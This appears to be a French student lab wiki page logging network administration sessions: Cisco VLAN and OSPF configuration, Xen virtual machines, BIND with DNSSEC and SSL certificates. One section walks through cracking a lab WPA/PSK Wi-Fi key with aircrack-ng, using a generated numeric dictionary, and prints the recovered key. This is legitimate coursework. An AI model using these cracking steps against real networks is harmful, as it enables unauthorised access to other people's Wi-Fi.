  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
==Séance 1 : 26/11/2018==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage réseau IPV4 routé en deux sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage du réseau IPV4 non routée en sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
==Séance 2 : 27/11/2018==&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
===Mise en place du routeur et connexion à celui ci===&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
===Configuration du routeur : Configuration des ports===&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
===Mise en place de la machine virtuelle===&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour autoriser les connections ssh. Dans /etc/ssh/sshd_config  &lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
==Séance 3 : 10/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Config Routeur 3560===&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
===Mise en place des partitions pour la VM===&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
===Mise en place serveur DNS===&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
===Certificat SSL===&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Installation de DNSSEC===&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
==Séance 3.5 : 14/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Craquage WPA/PSK par dictionnaire===&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
====Récupération du handshake====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
====Rappel montage USB====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
====Crack WPA/PSK====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
==Séance 4 : 17/12/2018==&lt;br /&gt;
===Correction IPV6 routeur===&lt;br /&gt;
&lt;br /&gt;
==== Vlan 43 - XEN ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 131 - Interconnexion ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 10+N - Groupe N ====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
